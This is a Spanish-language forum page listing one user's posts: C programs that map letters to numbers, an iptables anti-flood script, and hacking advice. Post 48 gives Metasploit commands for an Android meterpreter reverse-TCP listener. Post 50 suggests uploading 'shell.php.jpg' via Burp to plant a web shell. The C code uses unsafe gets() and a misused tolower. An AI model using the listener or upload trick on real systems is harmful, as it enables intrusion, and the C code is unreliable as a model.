Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - v4char

#41
Cita de: CoolTesting en 15 Septiembre 2015, 04:33 AM
Está programado en C#, si tienen alguna duda puedo subir un link del archivo scaneado en virustotal.
Se puede ofuscar cualquier cosa yo sin código fuente no me fio
#42
GNU/Linux / Debian + DWM
15 Septiembre 2015, 05:13 AM
Debian + dwm


[MOD] Imagen adaptada a las Reglas del Foro.
#43
Tengo una duda cuando haces un rand en C siempre que ejecutes en ese ordenador te va a dar el mismo número?
#44
Con esto funciona la ñ pero solo en Windows, por lo menos en el mio
Código (cpp) [Seleccionar]
#include <stdio.h>
#include <string.h>

int obtener_pos(char mensaje)
{
   switch (mensaje)
   {
   case 'a':
       return 1;
       break;
   case 'b':
       return 2;
       break;
   case 'c':
       return 3;
       break;
   case 'd':
       return 4;
       break;
   case 'e':
       return 5;
       break;
   case 'f':
       return 6;
       break;
   case 'g':
       return 7;
       break;
   case 'h':
       return 8;
       break;
   case 'i':
       return 9;
       break;
   case 'j':
       return 10;
       break;
   case 'k':
       return 11;
       break;
   case 'l':
       return 12;
       break;
   case 'm':
       return 13;
       break;
   case 'n':
       return 14;
       break;
   case 'o':
       return 16;
       break;
   case 'p':
       return 17;
       break;
   case 'q':
       return 18;
       break;
   case 'r':
       return 19;
       break;
   case 's':
       return 20;
       break;
   case 't':
       return 21;
       break;
   case 'u':
       return 22;
       break;
   case 'v':
       return 23;
       break;
   case 'w':
       return 24;
       break;
   case 'x':
       return 25;
       break;
   case 'y':
       return 26;
       break;
   case 'z':
       return 27;
       break;
   default:
       if((int)mensaje==-92)
       {
           return 15;
           break;
       }
       return 0;

       break;

   }

}

int main()
{
   char mensaje[501];

   printf("Introduce mensaje: ");
   fflush(stdout);
   gets(mensaje);

   sprintf( mensaje, "%s", tolower(mensaje) );

   int i;

   for(i=0;i<strlen(mensaje);i++)
   {
       printf("%i\n", obtener_pos(mensaje[i]));
   }

   return 0;
}
#45
Hice esto en C espero que te funcione los caracteres que no reconoce los pone como 0

Código (cpp) [Seleccionar]
#include <stdio.h>
#include <string.h>

int obtener_pos(char mensaje)
{
   switch (mensaje)
   {
   case 'a':
       return 1;
       break;
   case 'b':
       return 2;
       break;
   case 'c':
       return 3;
       break;
   case 'd':
       return 4;
       break;
   case 'e':
       return 5;
       break;
   case 'f':
       return 6;
       break;
   case 'g':
       return 7;
       break;
   case 'h':
       return 8;
       break;
   case 'i':
       return 9;
       break;
   case 'j':
       return 10;
       break;
   case 'k':
       return 11;
       break;
   case 'l':
       return 12;
       break;
   case 'm':
       return 13;
       break;
   case 'n':
       return 14;
       break;
   case 'o':
       return 15;
       break;
   case 'p':
       return 16;
       break;
   case 'q':
       return 17;
       break;
   case 'r':
       return 18;
       break;
   case 's':
       return 19;
       break;
   case 't':
       return 20;
       break;
   case 'u':
       return 21;
       break;
   case 'v':
       return 22;
       break;
   case 'w':
       return 23;
       break;
   case 'x':
       return 24;
       break;
   case 'y':
       return 25;
       break;
   case 'z':
       return 26;
       break;

   default:
       return 0;
       break;
   }

}

int main()
{
   char mensaje[501];

   printf("Introduce mensaje: ");
   fflush(stdout);
   gets(mensaje);

   sprintf( mensaje, "%s", tolower(mensaje) );

   int i;

   for(i=0;i<strlen(mensaje);i++)
   {
       printf("%i\n", obtener_pos(mensaje[i]));
   }

   return 0;
}
#47
Si esto puede ayudar.

# Iptables

IPT="/sbin/iptables"
ETH="eth0"

#Todo el tráfico syn
$IPT -P INPUT DROP
$IPT -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPT -A INPUT -p tcp ! --syn -j REJECT --reject-with tcp-reset
$IPT -A INPUT -m state --state INVALID -j DROP
$IPT -P OUTPUT DROP
$IPT -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPT -A OUTPUT -p tcp ! --syn -j REJECT --reject-with tcp-reset
$IPT -A OUTPUT -m state --state INVALID -j DROP
$IPT -P FORWARD DROP
$IPT -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPT -A FORWARD -p tcp ! --syn -j REJECT --reject-with tcp-reset
$IPT -A FORWARD -m state --state INVALID -j DROP
$IPT -A INPUT -i lo -j ACCEPT
$IPT -A OUTPUT -o lo -j ACCEPT
$IPT -A FORWARD -i lo -o lo -j ACCEPT

#Cuando sube la carga
$IPT -A INPUT -p tcp --syn -j REJECT --reject-with icmp-port-unreachable

#La que mejor va
$IPT -N syn-flood
$IPT -A syn-flood -m limit --limit 100/second --limit-burst 150 -j RETURN
$IPT -A syn-flood -j LOG --log-prefix "SYN flood: "
$IPT -A syn-flood -j DROP

#Igual que el de arriba pero muy raw
$IPT -N syn-flood
$IPT -A INPUT -i eth0:2 -p tcp --syn -j syn-flood
$IPT -A syn-flood -m limit --limit 1/s --limit-burst 4 -j RETURN
$IPT -A syn-flood -j DROP
$IPT -A INPUT -p tcp -m tcp --tcp-flags SYN,RST,ACK SYN -m limit --limit 1/sec -j ACCEPT
$IPT -A INPUT -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK RST -m limit --limit 1/sec -j ACCEPT

#Descartar paquetes mal formados
$IPT -N PKT_FAKE
$IPT -A PKT_FAKE -m state --state INVALID -j DROP
$IPT -A PKT_FAKE -p tcp --dport 80 --tcp-flags ALL ACK,RST,SYN,FIN -j DROP
$IPT -A PKT_FAKE -p tcp --dport 80 --tcp-flags SYN,FIN SYN,FIN -j DROP
$IPT -A PKT_FAKE -p tcp --dport 80 --tcp-flags SYN,RST SYN,RST -j DROP
$IPT -A PKT_FAKE -p tcp --dport 80 ! --syn -m state --state NEW -j DROP
$IPT -A PKT_FAKE -f -j DROP
$IPT -A PKT_FAKE -j RETURN

#Syn-flood
$IPT -N syn-flood
$IPT -A INPUT -i eth+ -p tcp --tcp-flags SYN,ACK,FIN,RST RST -j syn-flood
$IPT -A FORWARD -i eth+ -p tcp --tcp-flags SYN,ACK,FIN,RST RST -j syn-flood
$IPT -A syn-flood -m limit --limit 4/s --limit-burst 16 -j RETURN
$IPT -A syn-flood -m limit --limit 75/s --limit-burst 100 -j RETURN -A syn-flood -j LOG --log-prefix "SYN FLOOD " --log-tcp-sequence --log-tcp-options --log-ip-options -m limit --limit 1/second
$IPT -A syn-flood -j DROP

#Requiere módulo "recent"
modprobe ipt_recent
$IPT -A INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
$IPT -A INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 10 --hitcount 10 -j DROP

# explicación:
# Se añade cada ip que se conecte a la tabla de recent
# Por por cada ip en la tabla de recent si hace mas de x hits en x segundos, se dropea.
$IPT -I INPUT -p tcp --syn -m recent --set
$IPT -I INPUT -p tcp --syn -m recent --update --seconds 10 --hitcount 30 -j DROP

#UDP Flood
$IPT -A OUTPUT -p udp -m state --state NEW -j ACCEPT
$IPT -A OUTPUT -p udp -m limit --limit 100/s -j ACCEPT
$IPT -A OUTPUT -p udp -j DROP

#Evitando Layer7 DoS limitando a 80 la máxima cantidad de conexiones
$IPT -A INPUT -p tcp --dport 80 -m hashlimit --hashlimit-upto 50/min --hashlimit-burst 80 --hashlimit-mode srcip --hashlimit-name http -j ACCEPT
$IPT -A INPUT -p tcp --dport 80 -j DROP

#Permitir el ping, pero a 1 paquete por segundo, para evitar un ataque ICMP Flood
$IPT -A INPUT -p icmp -m state --state NEW --icmp-type echo-request -m limit --limit 1/s --limit-burst 1 -j ACCEPT
$IPT -A INPUT -p icmp -j DROP

#Evitando que escaneen la máquina
$IPT -A INPUT -i $ETH -p tcp -m tcp --tcp-flags FIN,SYN,RST,PSH,ACK,URG NONE –j DROP
$IPT -A INPUT -i $ETH -p tcp -m tcp --tcp-flags SYN,FIN SYN,FIN –j DROP
$IPT -A INPUT -i $ETH -p tcp -m tcp --tcp-flags SYN,RST SYN,RST –j DROP
$IPT -A INPUT -i $ETH -p tcp -m tcp --tcp-flags FIN,RST FIN,RST –j DROP
$IPT -A INPUT -i $ETH -p tcp -m tcp --tcp-flags ACK,FIN FIN –j DROP
$IPT -A INPUT -i $ETH -p tcp -m tcp --tcp-flags ACK,URG URG –j DROP

exit 0
#48
Hacking / Re: ayuda con metasploit
27 Julio 2015, 02:44 AM
en metasploit pon en set host 0.0.0.0 en vez de poner tu no ip

msf > use multi/handler
          set PAYLOAD androit / meterpreter / reverse_tcp
          set LHOST 0.0.0.0
          set LPORT 5555
          run o exploit
#50
Hacking / Re: Como Explotar Vulnerabilidad web
27 Julio 2015, 02:39 AM
Si tienes acceso a subir un archivo puedes probar a subir un archivo "shell.php.jpg" y con burp suit puedes modificar el paquete para subirlo como php, pero es raro que esto funcione, normalmente las web suelen comprobar que la imagen es realemnte una imagen y que no sea otra cosa.

Pero segun el tipo de verificacion puedes usar una tecnica u otra. verhttp://hackers2devnull.blogspot.com.es/2013/05/how-to-shell-server-via-image-upload.html.